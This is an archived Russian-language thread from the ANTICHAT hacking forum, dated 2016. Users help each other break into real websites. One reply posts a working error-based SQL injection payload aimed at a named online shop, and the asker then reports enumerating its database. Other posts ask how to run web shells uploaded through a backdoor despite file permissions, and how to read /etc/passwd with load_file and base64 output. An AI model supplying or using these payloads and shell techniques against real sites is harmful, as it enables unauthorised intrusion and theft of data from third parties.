ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
31.08.2016, 06:05
|
|
Guest
Сообщений: n/a
Провел на форуме:
0
Репутация:
-5
|
|
Есть возможность залить шелл через бекдор, но при заливке через wget,curl или copy - автоматом на любой файл выставляются засратые права не позволяющие его запустить. chmod не помогает права меняются, но на выполнение всё равно нет. В других форматах (не php) пробовал притягивать - та же история. Можно что то придумать чтобы как то получить нормальные права и запустить шелл?
|
|
|
|
31.08.2016, 12:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
104689
Репутация:
1
|
|
keran.am/catalog/296-fonariki/1'%22-fonar_909_9led_3aaa.html помогите раскрутить
|
|
|
|
31.08.2016, 13:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
31545
Репутация:
6
|
|
Сообщение от Sensoft
Sensoft said:
↑
keran.am/catalog/296-fonariki/1'%22-fonar_909_9led_3aaa.html помогите раскрутить
Код HTML:
HTML:
http://keran.am/catalog/296-fonariki/119-fonar.html'or(ExtractValue(1,concat(0x3a,(select(version())))))='1
|
|
|
|
31.08.2016, 13:15
|
|
Guest
Сообщений: n/a
Провел на форуме:
104689
Репутация:
1
|
|
Сообщение от R3hab
R3hab said:
↑
Код HTML:
HTML:
http://keran.am/catalog/296-fonariki/119-fonar.html'or(ExtractValue(1,concat(0x3a,(select(version())))))='1
Спасибо, подправил за место версии поставил INFORMATION_SCHEMA узнал bd
|
|
|
|
31.08.2016, 13:35
|
|
Guest
Сообщений: n/a
Провел на форуме:
31545
Репутация:
6
|
|
залил шелл на сайт,но не хочет открываться,выдает ошибку
Сообщение от None
500 Internal Server Error
можно ее как то обойти? |
|
|
|
31.08.2016, 13:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
104689
Репутация:
1
|
|
Сообщение от R3hab
R3hab said:
↑
залил шелл на сайт,но не хочет открываться,выдает ошибку
можно ее как то обойти? Попробуй залить другой, мог антивирус сервака удалить. Или там права на файлы поставлены тогда да, надо как то обходить
|
|
|
|
31.08.2016, 13:57
|
|
Guest
Сообщений: n/a
Провел на форуме:
33728
Репутация:
14
|
|
Сообщение от R3hab
R3hab said:
↑
залил шелл на сайт,но не хочет открываться,выдает ошибку
можно ее как то обойти? Значит не залил. Возможно обращаешься по неправильному пути.
|
|
|
|
31.08.2016, 13:59
|
|
Guest
Сообщений: n/a
Провел на форуме:
31545
Репутация:
6
|
|
Сообщение от pw0ned
pw0ned said:
↑
Значит не залил. Возможно обращаешься по неправильному пути. если бы не залилось,то выдавало бы другую ошибку
Сообщение от None
404 Not Found
|
|
|
|
31.08.2016, 14:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
33728
Репутация:
14
|
|
Сообщение от R3hab
R3hab said:
↑
если бы не залилось,то выдавало бы другую ошибку точно.
ну тогда видимо chmod, выставлены права на папку к которой обращаешься.
|
|
|
|
01.09.2016, 03:37
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906
Репутация:
-5
|
|
Имеется sql-inj через нее можно смотреть файлы
....mid((cast(concat(load_file(/etc/passwd),.....
Возможно ли вывод load_file сделать в base64?
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
